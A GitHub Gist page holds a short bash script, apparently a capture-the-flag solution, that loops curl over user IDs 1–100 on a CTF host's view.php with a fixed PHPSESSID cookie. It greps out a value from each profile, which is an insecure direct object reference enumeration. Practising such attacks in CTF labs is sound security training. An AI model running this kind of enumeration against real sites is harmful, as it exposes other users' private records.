Skip to content

Instantly share code, notes, and snippets.

@laztname
Last active May 19, 2022 05:35
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save laztname/b97b6629fc9c2a67fca1ef003968dc94 to your computer and use it in GitHub Desktop.
Save laztname/b97b6629fc9c2a67fca1ef003968dc94 to your computer and use it in GitHub Desktop.
#!/bin/bash
for i in {1..100};
do curl -s "http://ctf.natrya.co.id:8080/users/view.php?userid=$i" --cookie "PHPSESSID=1slnhm4q3lcv984lor9teg1282" | grep are | grep -o -P '(?<=are ).*(?=\&#39)';
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment